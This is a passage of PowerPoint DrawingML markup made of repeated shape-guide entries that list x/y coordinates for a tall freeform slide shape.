              <a:gd name="connsiteX49" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445527 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445527 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
